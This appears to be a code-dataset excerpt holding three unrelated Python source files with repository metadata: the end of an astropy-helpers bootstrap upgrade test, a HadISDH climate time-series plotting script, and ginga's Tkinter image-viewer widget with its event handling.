# Just take the last line--on Python 2.6 distutils logs warning
# messages to stdout instead of stderr, causing them to be mixed up
# with our expected output
path = stdout.splitlines()[-1].strip()
# easy_install should have worked by 'installing' astropy_helpers as a
# .egg in the current directory
eggs = glob.glob('*.egg')
assert eggs
egg = source.join(eggs[0])
assert os.path.isdir(str(egg))
assert path == str(egg.join('_astropy_helpers_test_',
'__init__.py'))
def test_upgrade(tmpdir, capsys):
# Run the testpackage fixture manually, since we use it multiple times in
# this test to make different versions of _astropy_helpers_test_
orig_dir = testpackage(tmpdir.mkdir('orig'))
# Make a test package that uses _astropy_helpers_test_
source = tmpdir.mkdir('source')
dist_dir = source.mkdir('dists')
orig_dir.copy(source.join('_astropy_helpers_test_'))
with source.as_cwd():
setup_py = TEST_SETUP_PY.format(args='auto_upgrade=True')
source.join('setup.py').write(setup_py)
# This will be used to later to fake downloading the upgrade package
source.join('setup.cfg').write(textwrap.dedent("""\
[easy_install]
find_links = {find_links}
""".format(find_links=str(dist_dir))))
# Make additional "upgrade" versions of the _astropy_helpers_test_
# package--one of them is version 0.2 and the other is version 0.1.1. The
# auto-upgrade should ignore version 0.2 but use version 0.1.1.
upgrade_dir_1 = testpackage(tmpdir.mkdir('upgrade_1'), version='0.2')
upgrade_dir_2 = testpackage(tmpdir.mkdir('upgrade_2'), version='0.1.1')
dists = []
# For each upgrade package go ahead and build a source distribution of it
# and copy that source distribution to a dist directory we'll use later to
# simulate a 'download'
for upgrade_dir in [upgrade_dir_1, upgrade_dir_2]:
with silence():
run_setup(str(upgrade_dir.join('setup.py')),
['sdist', '--dist-dir=dist', '--formats=gztar'])
dists.append(str(upgrade_dir.join('dist')))
for dist_file in upgrade_dir.visit('*.tar.gz'):
dist_file.copy(source.join('dists'))
# Monkey with the PackageIndex in ah_bootstrap so that it is initialized
# with the test upgrade packages, and so that it does not actually go out
# to the internet to look for anything
import ah_bootstrap
class FakePackageIndex(PackageIndex):
def __init__(self, *args, **kwargs):
PackageIndex.__init__(self, *args, **kwargs)
self.to_scan = dists
def find_packages(self, requirement):
# no-op
pass
ah_bootstrap.PackageIndex = FakePackageIndex
try:
with source.as_cwd():
# Now run the source setup.py; this test is similar to
# test_download_if_needed, but we explicitly check that the correct
# *version* of _astropy_helpers_test_ was used
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
path = stdout.splitlines()[-1].strip()
eggs = glob.glob('*.egg')
assert eggs
egg = source.join(eggs[0])
assert os.path.isdir(str(egg))
assert path == str(egg.join('_astropy_helpers_test_',
'__init__.py'))
assert 'astropy_helpers_test-0.1.1-' in str(egg)
finally:
ah_bootstrap.PackageIndex = PackageIndex
|
eteq/astropy-helpers
|
astropy_helpers/tests/test_ah_bootstrap.py
|
Python
|
bsd-3-clause
| 11,986
|
[
"VisIt"
] |
c90e5db5bc8afc8c9da36d40b4a7025bfba1912c672c39c1364a6edf0183b142
|
#!/usr/local/sci/bin/python
#***************************************
# 1 April 2014 KMW - v1
# Plots global time series from netCDF - cannot work with uncertainties right now
#
#************************************************************************
# START
#************************************************************************
# USE python2.7
# python2.7 PlotNiceTimeSeries_MAR2014.py
#
# REQUIRES
#
#************************************************************************
# Set up python imports
import matplotlib.pyplot as plt
import numpy as np
import sys, os
import scipy.stats
import struct
import os.path
import math
from mpl_toolkits.basemap import Basemap
import datetime as dt
from matplotlib.dates import date2num,num2date
#from netCDF4 import Dataset
from scipy.io import netcdf
from RandomsRanges import LetterRange
import copy
from LinearTrends import MedianPairwise
# Set up initial run choices
timetype='annual' #'monthly', 'annual'
nparams=7
param=list(['q','e','rh','tw','td','t','dpd']) # tw, q, e, rh, t, td, dpd
param2=list(['q','e','RH','Tw','Td','T','DPD']) # Tw, q, e, RH, T, Td, DPD
unitees=list(['g/kg','hPa','%rh','degrees C','degrees C','degrees C','degrees C'])
nowmon='MAR'
nowyear='2018'
thenmon='JAN'
thenyear='2018'
version='4.0.0.2017f'
styr=1973
edyr=2017
nyrs=(edyr-styr)+1
nmons=(nyrs)*12
climst=1981
climed=2010
stcl=climst-styr
edcl=climed-styr
# Set up directories and files
PLOTDIR='/data/local/hadkw/HADCRUH2/UPDATE'+str(edyr)+'/IMAGES/TIMESERIES/'
DATADIR='/data/local/hadkw/HADCRUH2/UPDATE'+str(edyr)+'/STATISTICS/TIMESERIES/'
IfType='.nc' #'.nc','.dat'
#INHFILEST='HadISDH.land'
##INHFILEED='5by5_'+thenmon+thenyear+'_areaTS_19732013'
#if timetype == 'monthly':
# INHFILEED='.'+version+'_global_ts_monthly_'+thenmon+thenyear+'.dat'
#else:
# INHFILEED='.'+version+'_global_ts_annual_'+thenmon+thenyear+'.dat'
#INOTHFULL='_areaTS_19732013'
#INOTHMASK='_HadISDHMASKareaTS_19732013'
#InFilSt = 'BLEND_'
#InFilMd = ['HadISDH.landq.2.1.0.2015p.marineq.QC0.0.0',
# 'HadISDH.lande.2.1.0.2015p.marinee.QC0.0.0',
# 'HadISDH.landRH.2.1.0.2015p.marineRH.QC0.0.0',
# 'HadISDH.landTw.2.1.0.2015p.marineTw.QC0.0.0',
# 'HadISDH.landTd.2.1.0.2015p.marineTd.QC0.0.0',
# 'HadISDH.landT.2.1.0.2015p.marineT.QC0.0.0',
# 'HadISDH.landDPD.2.1.0.2015p.marineDPD.QC0.0.0']
#InFilEd = '_APR2016_areaTS_19732015'
InFilSt = 'HadISDH.land'
InFilMd = '.'+version+'_FLATgridIDPHA5by5'
#InFilMd = ['q.'+version+'_FLATgridIDPHA5by5',
# 'e.2.1.0.2015p_FLATgridIDPHA5by5',
# 'RH.2.1.0.2015p_FLATgridIDPHA5by5',
# 'Tw.2.1.0.2015p_FLATgridIDPHA5by5',
# 'Td.2.1.0.2015p_FLATgridPHADPD5by5',
# 'T.2.1.0.2015p_FLATgridIDPHA5by5',
# 'DPD.2.1.0.2015p_FLATgridPHA5by5']
InFilEd = '_'+thenmon+thenyear+'_areaTS_1973'+str(edyr)
#InFilSt = 'ERAclimNBC_5x5_monthly_anomalies_from_daily_both_relax_'
#InFilMd = ['q',
# 'e',
# 'RH',
# 'Tw',
# 'Td',
# 'T',
# 'DPD']
#InFilEd = '_areaTS_19732015'
OUTPLOT='PlotNiceTimeSeries_'+InFilSt+'_'+timetype+'_'+nowmon+nowyear #+version+'_'+timetype+'_'+nowmon+nowyear
# Set up variables
mdi=-1e30
varH=[] # nvars(rows) by mons masked array
uncsHtot=[] # nvars(rows) by mons masked array
uncsHcov=[] # nvars(rows) by mons masked array
uncsHsamp=[] # nvars(rows) by mons masked array
uncsHstat=[] # nvars(rows) by mons masked array
othervarsFULL=[] # nvars(rows) by nothers (max) by mons masked array
othervarsMASK=[] # nvars(rows) by nothers (max) by mons masked array (HadISDH mask too)
#************************************************************************
# Subroutines
#************************************************************************
# READDATA
def ReadData(FileName,typee,delimee,skipee):
''' Use numpy genfromtxt reading to read in all rows from a complex array '''
''' Need to specify format as it is complex '''
''' outputs an array of tuples that in turn need to be subscripted by their names defaults f0...f8 '''
return np.genfromtxt(FileName, dtype=typee,delimiter=delimee,skip_footer=skipee) # ReadData
#************************************************************************
# PlotNiceTimeSeries
def PlotNiceTimeSeries(TheFile,TheHvars,TheUnitees,
TheMCount,TheYCount,TheTimeType,TheStYr,TheEdYr,TheMDI,TheColls,TheParams):
''' Plot a panel for each element of TheHvars '''
''' Add Coverage, Sampling and Station uncertainty ranges '''
''' Add lines for any extra estimates (TheVars) and HadISDH MASKED versions '''
''' Save as png and eps '''
''' TheHvars is a multi-row array: rows for vars, columns for months '''
''' Ditto TheHuncs C=coverage, Sp=sampling, St=station '''
''' TheLablees is the name list for all other vars '''
''' TheUnitees is the units name list '''
''' TheVars is a multirow array if there is 1+ var available - or [] '''
''' TheMASKVars - ditto above but masked to HadISDH coverage '''
''' TheMCount - number of months, TheStYr/EdYr - start and end years '''
''' TheMDI - missing data indicator for masking '''
''' TheColls - dictionary of colours for each dataset '''
# set up number of panels and number of lines
nplots=len(TheParams[:])
print('PLOT NUMBERS: ',nplots)
# nlines=[]
# for n in range(nplots):
# print(n,TheLablees[n][:])
# nlines.append(len(TheLablees[n][:]))
Letteree=[]
Letteree=LetterRange(0,nplots)
# set up x axes
if TheTimeType == 'monthly':
TheMonths=[]
yr=TheStYr
mon=1
for m in range(TheMCount):
TheMonths.append(dt.date(yr,mon,1))
mon=mon+1
if mon == 13:
mon=1
yr=yr+1
TheMonths=np.array(TheMonths)
else:
TheMonths=[]
yr=TheStYr
mon=1
for y in range(TheYCount):
TheMonths.append(dt.date(yr,mon,1))
yr=yr+1
TheMonths=np.array(TheMonths)
xtitlee='Years'
# set up dimensions and plot
xpos=[]
ypos=[]
xfat=[]
ytall=[]
totalyspace=0.90 # start 0.08 end 0.98
totalxspace=0.84 # start 0.12 end 0.98
for n in range(nplots):
xpos.append(0.14)
ypos.append(0.98-((n+1)*(totalyspace/nplots)))
xfat.append(totalxspace)
ytall.append(totalyspace/nplots)
# plt.clf()
# fig = plt.figure(1,figsize=(8,12))
# plt.axes([0.15,0.1,0.8,0.80])
f,axarr=plt.subplots(7,figsize=(6,12),sharex=True) #6,18
for pp in range(nplots):
print('Plot: ',pp,TheParams[pp])
# print(TheHvars[pp,0:10])
# print(TheHuncsC[pp,0:10])
# print(TheHuncsSp[pp,0:10])
# print(TheHuncsSt[pp,0:10])
#axarr[pp].set_size(14)
axarr[pp].set_position([xpos[pp],ypos[pp],xfat[pp],ytall[pp]])
if TheTimeType == 'monthly':
axarr[pp].set_xlim([TheMonths[0],TheMonths[TheMCount-1]])
else:
axarr[pp].set_xlim([TheMonths[0],TheMonths[TheYCount-1]])
# axarr[pp].set_ylim([math.floor(min(TheHvars[pp,:]-TheHuncsC[pp,:])),
# math.ceil(max(TheHvars[pp,:]+TheHuncsC[pp,:]))])
# if len(TheHuncsC[pp,:]) > 0:
# axarr[pp].fill_between(TheMonths,TheHvars[pp,:]+TheHuncsC[pp,:],TheHvars[pp,:]-TheHuncsC[pp,:],
# facecolor='LightGray',edgecolor='none')
# axarr[pp].fill_between(TheMonths,TheHvars[pp,:]+TheHuncsSp[pp,:],TheHvars[pp,:]-TheHuncsSp[pp,:],
# facecolor='LightSlateGray',edgecolor='none')
# axarr[pp].fill_between(TheMonths,TheHvars[pp,:]+TheHuncsSt[pp,:],TheHvars[pp,:]-TheHuncsSt[pp,:],
# facecolor='LightSlateGray',edgecolor='none')
if timetype == 'monthly':
axarr[pp].plot(TheMonths,TheHvars[pp,:],c='black',linewidth=0.5)
else:
axarr[pp].plot(TheMonths,TheHvars[pp,:],c='black',linewidth=2)
axarr[pp].annotate(Letteree[pp]+') '+TheParams[pp],xy=(0.03,0.9),xycoords='axes fraction',size=10)
# get the decadal linear trend and annotate
TrendStats=np.empty(3)
TrendStats=MedianPairwise(TheHvars[pp,:],TheMDI,TrendStats)
if (timetype == 'monthly'):
TrendStats=np.array(TrendStats)*120.
else:
TrendStats=np.array(TrendStats)*10.
trendlinstr='{0:5.2f}'.format(TrendStats[0])+' ('+'{0:5.2f}'.format(TrendStats[1])+' to '+'{0:5.2f}'.format(TrendStats[2])+') '+'{:s}'.format(TheUnitees[pp])+' decade$^{-1}$'
axarr[pp].annotate(trendlinstr,xy=(0.14,0.9),xycoords='axes fraction',color='black',size=10)
# for ll in range(nlines[pp]): # no problem if 0
# print('Other: ',ll,TheLablees[pp][ll])
## axarr[pp].plot(TheMonths,TheVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linewidth=0.5)
## axarr[pp].plot(TheMonths,TheMASKVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linestyle='dotted',linewidth=0.5)
# if timetype == 'monthly':
# axarr[pp].plot(TheMonths,TheMASKVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linewidth=0.5)
# else:
# axarr[pp].plot(TheMonths,TheMASKVars[pp,ll,:],c=TheColls[TheLablees[pp][ll]],linewidth=2)
#
# axarr[pp].annotate(TheLablees[pp][ll],xy=(0.14,0.82-(ll*0.08)),xycoords='axes fraction',
# color=TheColls[TheLablees[pp][ll]],size=10)
axarr[pp].set_ylabel(TheUnitees[pp],fontsize=10)
if TheTimeType == 'monthly':
axarr[pp].hlines(0,TheMonths[0],TheMonths[TheMCount-1],color='black')
else:
axarr[pp].hlines(0,TheMonths[0],TheMonths[TheYCount-1],color='black')
axarr[nplots-1].set_xlabel(xtitlee,fontsize=10)
# Figure Watermark and Labels
# watermarkstring="/".join(os.getcwd().split('/')[4:])+'/'+os.path.basename( __file__ )+" "+dt.datetime.strftime(dt.datetime.now(), "%d-%b-%Y %H:%M")
# plt.figtext(0.01,0.01,watermarkstring,size=6)
#plt.show()
plt.savefig(TheFile+".eps")
plt.savefig(TheFile+".png")
return #PlotNiceDotsMap
#************************************************************************
# MAIN PROGRAM
#************************************************************************
# set up loops to read in all time series
if timetype == 'monthly':
varH=np.zeros((nparams,nmons))
uncsHcov=np.zeros((nparams,nmons))
uncsHsamp=np.zeros((nparams,nmons))
uncsHstat=np.zeros((nparams,nmons))
uncsHtot=np.zeros((nparams,nmons))
othervarsFULL=np.zeros((nparams,3,nmons))
othervarsMASK=np.zeros((nparams,3,nmons))
else:
varH=np.zeros((nparams,nyrs))
uncsHcov=np.zeros((nparams,nyrs))
uncsHsamp=np.zeros((nparams,nyrs))
uncsHstat=np.zeros((nparams,nyrs))
uncsHtot=np.zeros((nparams,nyrs))
othervarsFULL=np.zeros((nparams,3,nyrs))
othervarsMASK=np.zeros((nparams,3,nyrs))
varH[:,:]=mdi
uncsHcov[:,:]=mdi
uncsHsamp[:,:]=mdi
uncsHstat[:,:]=mdi
uncsHtot[:,:]=mdi
othervarsFULL[:,:,:]=mdi
othervarsMASK[:,:,:]=mdi
for nv in range(nparams):
tmpvar=[]
tmpvarUcov=[]
tmpvarUsamp=[]
tmpvarUstat=[]
tmpvarUtot=[]
print('Reading in: ',param2[nv])
# read in HadISDH time series
if IfType == '.nc':
MyNCFile=DATADIR+InFilSt+param2[nv]+InFilMd+InFilEd+'.nc'
#MyNCFile=DATADIR+INHFILEST+param2[nv]+'.'+version+'_FLATgrid'+homogtype[nv]+INHFILEED+'.nc'
f=netcdf.netcdf_file(MyNCFile,'r')
if param[nv]=='q':
var=f.variables['glob_q_anoms']
elif param[nv]=='e':
var=f.variables['glob_e_anoms']
elif param[nv]=='rh':
var=f.variables['glob_RH_anoms']
elif param[nv]=='t':
var=f.variables['glob_T_anoms']
elif param[nv]=='tw':
var=f.variables['glob_Tw_anoms']
elif param[nv]=='td':
var=f.variables['glob_Td_anoms']
elif param[nv]=='dpd':
var=f.variables['glob_DPD_anoms']
tmpvar=np.array(var.data)
f.close()
else: # its a text file
MyDatFile=DATADIR+INHFILEST+param2[nv]+INHFILEED
MyTypes=("|S10","float","float","float","float","float")
MyDelimiters=[10,10,10,10,10,10]
MySkips=1
RawData=ReadData(MyDatFile,MyTypes,MyDelimiters,MySkips)
tmpvar=np.array(RawData['f1'])
tmpvarUcov=np.array(RawData['f3'])
tmpvarUsamp=np.array(RawData['f2'])
tmpvarUstat=np.array(RawData['f4'])
tmpvarUtot=np.array(RawData['f5'])
# If working on annuals then make annual averages
if timetype == 'annual':
newtmpvar = np.zeros(nyrs)
tmpvar = np.reshape(tmpvar,(nyrs,12))
for yy in range(nyrs):
newtmpvar[yy] = np.mean(tmpvar[yy,:])
tmpvar = 0
tmpvar = copy.copy(newtmpvar)
newtmpvar = 0
# If HadISDH_land and climatology not 1981-2010 then rezero HadISDH to climatology - ASSUME NO MISSING DATA!!!
if (InFilSt == 'HadISDH.land') & ((climst != 1981) | (climed != 2010)):
print('Renorming...')
if timetype == 'monthly':
tmpvar=np.reshape(tmpvar,(nyrs,12))
for mm in range(12):
subarr=tmpvar[:,mm]
climarr=subarr[stcl:edcl]
subarr[:]=subarr[:]-np.mean(climarr)
tmpvar[:,mm]=subarr[:]
varH[nv,:]=np.reshape(tmpvar,(1,nmons))
else:
climarr=tmpvar[stcl:edcl]
tmpvar[:]=tmpvar[:]-np.mean(climarr)
varH[nv,:]=np.reshape(tmpvar,(1,nyrs))
else:
varH[nv,:]=copy.copy(tmpvar)
# if len(tmpvarUcov) > 0:
# uncsHcov[nv,:]=tmpvarUcov
# uncsHsamp[nv,:]=tmpvarUsamp
# uncsHstat[nv,:]=tmpvarUstat
# uncsHtot[nv,:]=tmpvarUtot
## read in all oTHER time series
# for no in range(len(others[nv][:])):
# print('Reading in others: ',no,others[nv][no])
# MyNCFile=DATADIR+others[nv][no]+'_'+param2[nv]+INOTHFULL+'.nc'
# f=netcdf.netcdf_file(MyNCFile,'r')
# var=f.variables['glob_anoms']
# newvar=np.array(var.data)
# f.close()
# if timetype == 'annual':
# newvar=np.reshape(newvar,(nyrs,12))
# for yy in range(nyrs):
# if newvar[yy,0] > mdi:
# othervarsFULL[nv,no,yy]=np.mean(newvar[yy,:])
# else:
# othervarsFULL[nv,no,:]=np.reshape(newvar,(1,nmons))#
#
# MyNCFile=DATADIR+others[nv][no]+'_'+param2[nv]+INOTHMASK+'.nc'
# f=netcdf.netcdf_file(MyNCFile,'r')
# var=f.variables['glob_anoms']
# newvar=np.array(var.data)
# f.close()
# if timetype == 'annual':
# newvar=np.reshape(newvar,(nyrs,12))
# for yy in range(nyrs):
# if newvar[yy,0] > mdi:
# othervarsMASK[nv,no,yy]=np.mean(newvar[yy,:])
# else:
# othervarsMASK[nv,no,:]=np.reshape(newvar,(1,nmons))
# convert to masked arrays and mask out missing data
print('Masking')
varH=np.ma.masked_array(varH)
varH[varH <= mdi]=np.ma.masked
#uncsHcov=np.ma.masked_array(uncsHcov)
#uncsHcov[uncsHcov <= mdi]=np.ma.masked
#uncsHsamp=np.ma.masked_array(uncsHsamp)
#uncsHsamp[uncsHsamp <= mdi]=np.ma.masked
#uncsHstat=np.ma.masked_array(uncsHstat)
#uncsHstat[uncsHstat <= mdi]=np.ma.masked
#uncsHtot=np.ma.masked_array(uncsHtot)
#uncsHtot[uncsHtot <= mdi]=np.ma.masked
#othervarsFULL=np.ma.masked_array(othervarsFULL)
#othervarsFULL[othervarsFULL <= mdi]=np.ma.masked
#othervarsMASK=np.ma.masked_array(othervarsMASK)
#othervarsMASK[othervarsMASK <= mdi]=np.ma.masked
## sort out in quadrature quantities for uncs where
## uncsHcov is total combined in quadrature
## uncsHsamp is uncsHstat+uncsHsamp quadrature contributions
## uncsHstat is uncsHstat quadrature contribution
#print('Sorting out Uncs...')
#for nv in range(nparams):
# RatsSamp=[]
# RatsStat=[]
# RatsSamp=(uncsHsamp[nv,:]**2)/((uncsHcov[nv,:]**2)+(uncsHsamp[nv,:]**2)+(uncsHstat[nv,:]**2))
# RatsStat=(uncsHstat[nv,:]**2)/((uncsHcov[nv,:]**2)+(uncsHsamp[nv,:]**2)+(uncsHstat[nv,:]**2))
# print(len(RatsSamp),len(RatsStat))
# uncsHcov[nv,:]=uncsHtot[nv,:]
# uncsHsamp[nv,:]=(uncsHtot[nv,:]*RatsSamp[:])+(uncsHtot[nv,:]*RatsStat[:])
# uncsHstat[nv,:]=uncsHtot[nv,:]*RatsStat[:]
# set up colour dictionary - so that each dataset has an associated colour
diccols={}
#diccols[sourceslist[0]]='Red'
#diccols[sourceslist[1]]='MediumBlue'
#diccols[sourceslist[2]]='DarkOrange'
#diccols[sourceslist[3]]='MediumSlateBlue'
# call plotter
print('Plotting...')
MyFile=PLOTDIR+OUTPLOT
#PlotNiceTimeSeries(MyFile,varH,uncsHcov,uncsHsamp,uncsHstat,
# others,unitees,othervarsFULL,othervarsMASK,
# nmons,nyrs,timetype,styr,edyr,mdi,
# diccols,param2)
lablees=['a','b','c','d','e','f','g']
PlotNiceTimeSeries(MyFile,varH,unitees,nmons,nyrs,timetype,styr,edyr,mdi,
diccols,param2)
# stop()
print("And, we are done!")
|
Kate-Willett/Climate_Explorer
|
PYTHON/PlotNiceTimeSeries_APR2016.py
|
Python
|
cc0-1.0
| 16,514
|
[
"NetCDF"
] |
da621d9e006d79ff8e80e446359a12df208b256a8b495cdb04ac3b57e089447f
|
#
# ImageViewTk.py -- classes for the display of FITS files in Tk surfaces
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
import numpy
import PIL.Image as PILimage
import PIL.ImageTk as PILimageTk
from ginga import Mixins, Bindings, colors
from ginga.canvas.mixins import DrawingMixin, CanvasMixin, CompoundMixin
from ginga.util.toolbox import ModeIndicator
try:
# See if we have aggdraw module--best choice
from ginga.aggw.ImageViewAgg import ImageViewAgg as ImageView, \
ImageViewAggError as ImageViewError
except ImportError:
try:
# No, hmm..ok, see if we have opencv module...
from ginga.cvw.ImageViewCv import ImageViewCv as ImageView, \
ImageViewCvError as ImageViewError
except ImportError:
try:
# No dice. How about the PIL module?
from ginga.pilw.ImageViewPil import ImageViewPil as ImageView, \
ImageViewPilError as ImageViewError
except ImportError:
# Fall back to mock--there will be no graphic overlays
from ginga.mockw.ImageViewMock import ImageViewMock as ImageView, \
ImageViewMockError as ImageViewError
class ImageViewTkError(ImageViewError):
pass
class ImageViewTk(ImageView):
def __init__(self, logger=None, rgbmap=None, settings=None):
ImageView.__init__(self, logger=logger,
rgbmap=rgbmap,
settings=settings)
self.tkcanvas = None
self.tkphoto = None
self.msgtask = None
# see reschedule_redraw() method
self._defer_task = None
def set_widget(self, canvas):
"""Call this method with the Tkinter canvas that will be used
for the display.
"""
self.tkcanvas = canvas
canvas.bind("<Configure>", self._resize_cb)
width = canvas.winfo_width()
height = canvas.winfo_height()
self.configure_window(width, height)
def get_widget(self):
return self.tkcanvas
def update_image(self):
if self.tkcanvas is None:
return
cr = self.tkcanvas
# remove all old items from the canvas
items = cr.find_all()
for item in items:
cr.delete(item)
wd, ht = self.get_window_size()
# Get surface as a numpy array
surface = self.get_surface()
if isinstance(surface, numpy.ndarray):
arr8 = surface
else:
arr8 = numpy.fromstring(surface.tostring(), dtype=numpy.uint8)
arr8 = arr8.reshape((ht, wd, 4))
# make a Tk photo image and stick it to the canvas
image = PILimage.fromarray(arr8)
photo = PILimageTk.PhotoImage(image)
# hang on to a reference otherwise it gets gc'd
self.tkphoto = photo
cr.create_image(0, 0, anchor='nw', image=photo)
# is this necessary?
cr.config(scrollregion=cr.bbox('all'))
def reschedule_redraw(self, time_sec):
if self.tkcanvas is not None:
try:
self.tkcanvas.after_cancel(self._defer_task)
except:
pass
time_ms = int(time_sec * 1000)
self._defer_task = self.tkcanvas.after(time_ms,
self.delayed_redraw)
def configure_window(self, width, height):
self.configure_surface(width, height)
def _resize_cb(self, event):
self.configure_window(event.width, event.height)
def set_cursor(self, cursor):
if self.tkcanvas is None:
return
self.tkcanvas.config(cursor=cursor)
def onscreen_message(self, text, delay=None):
if self.tkcanvas is None:
return
if self.msgtask:
try:
self.tkcanvas.after_cancel(self.msgtask)
except:
pass
self.message = text
self.redraw(whence=3)
if delay:
ms = int(delay * 1000.0)
self.msgtask = self.tkcanvas.after(ms,
lambda: self.onscreen_message(None))
class ImageViewEvent(ImageViewTk):
def __init__(self, logger=None, rgbmap=None, settings=None):
ImageViewTk.__init__(self, logger=logger, rgbmap=rgbmap,
settings=settings)
# last known window mouse position
self.last_win_x = 0
self.last_win_y = 0
# last known data mouse position
self.last_data_x = 0
self.last_data_y = 0
# Does widget accept focus when mouse enters window
self.follow_focus = True
self._button = 0
# @$%&^(_)*&^ tk!!
self._keytbl = {
'shift_l': 'shift_l',
'shift_r': 'shift_r',
'control_l': 'control_l',
'control_r': 'control_r',
'alt_l': 'alt_l',
'alt_r': 'alt_r',
'super_l': 'super_l',
'super_r': 'super_r',
'meta_right': 'meta_right',
'asciitilde': '~',
'grave': 'backquote',
'exclam': '!',
'at': '@',
'numbersign': '#',
'percent': '%',
'asciicircum': '^',
'ampersand': '&',
'asterisk': '*',
'dollar': '$',
'parenleft': '(',
'parenright': ')',
'underscore': '_',
'minus': '-',
'plus': '+',
'equal': '=',
'braceleft': '{',
'braceright': '}',
'bracketleft': '[',
'bracketright': ']',
'bar': '|',
'colon': ':',
'semicolon': ';',
'quotedbl': 'doublequote',
'apostrophe': 'singlequote',
'backslash': 'backslash',
'less': '<',
'greater': '>',
'comma': ',',
'period': '.',
'question': '?',
'slash': '/',
'space': 'space',
'escape': 'escape',
'return': 'return',
'tab': 'tab',
'f1': 'f1',
'f2': 'f2',
'f3': 'f3',
'f4': 'f4',
'f5': 'f5',
'f6': 'f6',
'f7': 'f7',
'f8': 'f8',
'f9': 'f9',
'f10': 'f10',
'f11': 'f11',
'f12': 'f12',
}
# Define cursors for pick and pan
#hand = openHandCursor()
hand = 'fleur'
self.define_cursor('pan', hand)
cross = 'cross'
self.define_cursor('pick', cross)
for name in ('motion', 'button-press', 'button-release',
'key-press', 'key-release', 'drag-drop',
'scroll', 'map', 'focus', 'enter', 'leave',
):
self.enable_callback(name)
def set_widget(self, canvas):
super(ImageViewEvent, self).set_widget(canvas)
canvas.bind("<Enter>", self.enter_notify_event)
canvas.bind("<Leave>", self.leave_notify_event)
canvas.bind("<FocusIn>", lambda evt: self.focus_event(evt, True))
canvas.bind("<FocusOut>", lambda evt: self.focus_event(evt, False))
canvas.bind("<KeyPress>", self.key_press_event)
canvas.bind("<KeyRelease>", self.key_release_event)
#canvas.bind("<Map>", self.map_event)
# scroll events in tk are overloaded into the button press events
canvas.bind("<ButtonPress>", self.button_press_event)
canvas.bind("<ButtonRelease>", self.button_release_event)
canvas.bind("<Motion>", self.motion_notify_event)
# TODO: Set up widget as a drag and drop destination
return self.make_callback('map')
def transkey(self, keyname):
self.logger.debug("key name in tk '%s'" % (keyname))
try:
return self._keytbl[keyname.lower()]
except KeyError:
return keyname
def get_keyTable(self):
return self._keytbl
def set_follow_focus(self, tf):
self.follow_focus = tf
def focus_event(self, event, hasFocus):
return self.make_callback('focus', hasFocus)
def enter_notify_event(self, event):
if self.follow_focus:
self.tkcanvas.focus_set()
return self.make_callback('enter')
def leave_notify_event(self, event):
self.logger.debug("leaving widget...")
return self.make_callback('leave')
def key_press_event(self, event):
# without this we do not get key release events if the focus
# changes to another window
self.tkcanvas.grab_set_global()
keyname = event.keysym
keyname = self.transkey(keyname)
self.logger.debug("key press event, key=%s" % (keyname))
return self.make_ui_callback('key-press', keyname)
def key_release_event(self, event):
self.tkcanvas.grab_release()
keyname = event.keysym
keyname = self.transkey(keyname)
self.logger.debug("key release event, key=%s" % (keyname))
return self.make_ui_callback('key-release', keyname)
def button_press_event(self, event):
x = event.x; y = event.y
button = 0
if event.num != 0:
# some kind of wierd convention for scrolling, shoehorned into
# Tk, I guess
if event.num in (4, 5):
direction = 0.0 # up
if event.num == 5:
# down
direction = 180.0
# 15 deg is standard 1-click turn for a wheel mouse
numDegrees = 15.0
self.logger.debug("scroll deg=%f direction=%f" % (
numDegrees, direction))
data_x, data_y = self.get_data_xy(x, y)
self.last_data_x, self.last_data_y = data_x, data_y
return self.make_ui_callback('scroll', direction, numDegrees,
data_x, data_y)
button |= 0x1 << (event.num - 1)
self._button = button
self.logger.debug("button event at %dx%d, button=%x" % (x, y, button))
data_x, data_y = self.get_data_xy(x, y)
return self.make_ui_callback('button-press', button, data_x, data_y)
def button_release_event(self, event):
# event.button, event.x, event.y
x = event.x; y = event.y
button = 0
if event.num != 0:
if event.num in (4, 5):
return False
button |= 0x1 << (event.num - 1)
self._button = 0
self.logger.debug("button release at %dx%d button=%x" % (x, y, button))
data_x, data_y = self.get_data_xy(x, y)
return self.make_ui_callback('button-release', button, data_x, data_y)
def get_last_win_xy(self):
return (self.last_win_x, self.last_win_y)
def get_last_data_xy(self):
return (self.last_data_x, self.last_data_y)
def motion_notify_event(self, event):
#button = 0
button = self._button
x, y = event.x, event.y
self.last_win_x, self.last_win_y = x, y
# num = event.num
# if num == 1:
# button |= 0x1
# elif num == 2:
# button |= 0x2
# elif num == 3:
# button |= 0x4
self.logger.debug("motion event at %dx%d, button=%x" % (x, y, button))
data_x, data_y = self.get_data_xy(x, y)
self.last_data_x, self.last_data_y = data_x, data_y
return self.make_ui_callback('motion', button, data_x, data_y)
## def drop_event(self, widget, context, x, y, selection, targetType,
## time):
## if targetType != self.TARGET_TYPE_TEXT:
## return False
## paths = selection.data.split('\n')
## self.logger.debug("dropped filename(s): %s" % (str(paths)))
## return self.make_ui_callback('drag-drop', paths)
class ImageViewZoom(Mixins.UIMixin, ImageViewEvent):
# class variables for binding map and bindings can be set
bindmapClass = Bindings.BindingMapper
bindingsClass = Bindings.ImageViewBindings
@classmethod
def set_bindingsClass(cls, klass):
cls.bindingsClass = klass
@classmethod
def set_bindmapClass(cls, klass):
cls.bindmapClass = klass
def __init__(self, logger=None, rgbmap=None, settings=None,
bindmap=None, bindings=None):
ImageViewEvent.__init__(self, logger=logger, rgbmap=rgbmap,
settings=settings)
Mixins.UIMixin.__init__(self)
self.ui_setActive(True)
if bindmap is None:
bindmap = ImageViewZoom.bindmapClass(self.logger)
self.bindmap = bindmap
bindmap.register_for_events(self)
if bindings is None:
bindings = ImageViewZoom.bindingsClass(self.logger)
self.set_bindings(bindings)
def get_bindmap(self):
return self.bindmap
def get_bindings(self):
return self.bindings
def set_bindings(self, bindings):
self.bindings = bindings
bindings.set_bindings(self)
class CanvasView(ImageViewZoom):
def __init__(self, logger=None, settings=None, rgbmap=None,
bindmap=None, bindings=None):
ImageViewZoom.__init__(self, logger=logger, settings=settings,
rgbmap=rgbmap,
bindmap=bindmap, bindings=bindings)
# Needed for UIMixin to propagate events correctly
self.objects = [self.private_canvas]
def set_canvas(self, canvas, private_canvas=None):
super(CanvasView, self).set_canvas(canvas,
private_canvas=private_canvas)
